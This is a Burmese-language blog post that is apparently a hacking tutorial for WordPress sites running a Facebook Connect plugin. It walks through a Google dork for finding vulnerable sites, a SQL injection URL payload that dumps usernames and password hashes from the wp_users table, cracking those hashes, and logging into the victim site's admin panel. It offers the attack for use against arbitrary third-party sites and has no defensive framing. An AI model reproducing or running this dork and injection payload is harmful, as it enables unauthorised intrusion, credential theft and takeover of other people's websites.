Wordpress Site ေတာ္ေတာ္မ်ားမ်ားဟာ သူတို ့ရဲ ့ site မွာ facebook နဲ ့ခ်ိပ္ဆက္ ဖို ့အတြက္ wordpress plugin ေတြကို အမ်ားအားျဖင့္အသံုးျပဳၾကပါတယ္။
အဲ့ဒီလို wordpress plugin ေတြ အသံုးျပဳျခင္းဟာ ေကာင္းတဲ ့အခ်က္ေတြရွိသလို ဆိုးတဲ့အခ်က္ေတြလည္းရွိပါတယ္။
အဲ့ဒီထဲကမွာ အဆိုးဆံုး အခ်က္ကေတာ့ အဲ့ဒီ plugin ကေနတဆင့္ အၾကီးမားဆံုး security ပိုင္းအားနည္းခ်က္ျဖစ္ေပၚလာျခင္းပါပဲ။
Wordpress plugin သံုးထားတဲ ့ site ေတာ္ေတာ္မ်ားမ်ားကို hacked လုပ္ဖို ့အတြက္
Step 1 : www.google.com ကိုသြားလိုက္ပါ။
Step 2 : ေအာက္မွာ ေပးထားတဲ ့dork ေလးကို အသံုးျပဳျပီး security hole ျဖစ္ေနတဲ ့site ကို ရွာေဖြ လိုက္ပါ။
inurl:"fbconnect_action=myhome"
Step 3 : Security ပိုင္းအားနည္းေနတဲ ့ site မ်ား ကိုေဖာ္ျပထားမွာျဖစ္ျပီး အဲ့ဒီ site ေတြထဲကမွ အဆင္ေျပရာ site တစ္ခုကို ေရြးလိုက္ပါ။
Step 4 : ေရြးခ်ယ္လိုက္တဲ ့ site's link ထဲက
?fbconnect_action=myhome&userid=
ေနရာမွာ ေအာက္မွာေဖာ္ျပထားတာ ကို အစားသြင္းလိုက္ပါ
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 5 : ဒါဆိုရင္ေတာ့ user name နဲ ့ password ကိုရရွိမွာျဖစ္ပါတယ္။
Step 6 : ရရွိလာတဲ ့ password ဟာ hash password အမ်ိဳးအစားျဖစ္ပါတယ္ ။
အဲ့ဒီ hash password ကို decode ျပဳလုပ္ဖို ့အတြက္ wordpress md5 (blowfish) လိုအပ္ပါတယ္။
ဒီေနရာမွာ download ျပဳလုပ္ပါ။ download လုပ္ျပီး run လိုက္ပါ။ ထို ့ေနာက္ မိမိ ရရွိထားတဲ့ hash password ကို copy/paste ျပဳလုပ္ျပီး decode လုပ္လိုက္ပါ။
Step 7 : Administrator panel ကို ရွာေဖြပါ။ အမ်ားအားျဖင့္ေတာ့ admin panel ကို ေအာက္ပါအတိုင္းရွာေဖြႏုိင္ပါတယ္။
www.victimsite.com/wp-admin သို ့မဟုတ္ www.victimsite.com/wp-login.php
(victimsite ေနရာမွာ မိမိ ေရြးခ်ယ္ထားတဲ ့site address ထည့္ရမွာျဖစ္ပါတယ္)
ဒါဆိုရင္ေတာ့ step 5 မွာရရွိထားတဲ့ username နဲ ့decode လုပ္လို ့ရထားတဲ့ password ကိုရရွိျပီးျဖစ္တဲ့အတြက္ အသံုးျပဳႏုိင္ပါျပီ။
Post a Comment
ေျပာခ်င္တာမ်ား ရွိက